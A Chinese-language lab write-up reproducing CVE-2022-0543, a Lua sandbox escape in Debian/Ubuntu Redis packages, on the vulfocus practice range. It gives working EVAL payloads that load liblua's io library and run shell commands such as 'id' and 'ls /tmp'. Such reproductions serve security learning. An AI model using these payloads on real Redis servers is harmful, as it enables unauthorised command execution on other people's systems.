vulfocus靶场之redis命令执行cve-2022-0543漏洞复现

漏洞:

Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。

Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令

1.工具方式: 使用Another Redis Desktop Manager

地址:AnotherRedisDesktopManager 发行版 - Gitee.com

输入网址和端口,点击OK

显示连接成功

输入攻击代码 payload即可:

查看当前id ,需要更改的地方红色字体:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

查看ls /tmp

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls /tmp", "r"); local res = f:read("*a"); f:close(); return res' 0

拿到flag:

相关推荐
数字供应链安全产品选型1 天前
AI造“虾”易,治理难?悬镜多模态 SCA 技术破局 AI 数字供应链治理困局!
人工智能·安全·网络安全·ai-native
ALex_zry1 天前
gRPC服务熔断与限流设计
c++·安全·grpc
kang0x01 天前
Night Coder - Writeup by AI
安全
紫金桥软件1 天前
国产化 + 跨平台,紫金桥组态软件夯实新能源企业“自主底座”
安全·scada·组态软件·国产工业软件·监控组态软件
小快说网安1 天前
高防 IP 的 “防护上限”:带宽、清洗能力、防御类型如何匹配业务需求
网络·tcp/ip·安全
星幻元宇VR1 天前
VR旋转蛋椅:沉浸式安全科普新体验
科技·学习·安全·vr·虚拟现实
祭曦念1 天前
越权漏洞的克星!用爬虫自动化检测平行越权/垂直越权漏洞
爬虫·安全·自动化
╰つ栺尖篴夢ゞ1 天前
Web之深入解析Cookie的安全防御与跨域实践
前端·安全·存储·cookie·跨域
Never_Satisfied1 天前
安全属性标志详解:HTTPOnly
安全
无名的小三轮1 天前
nmap使用手册
安全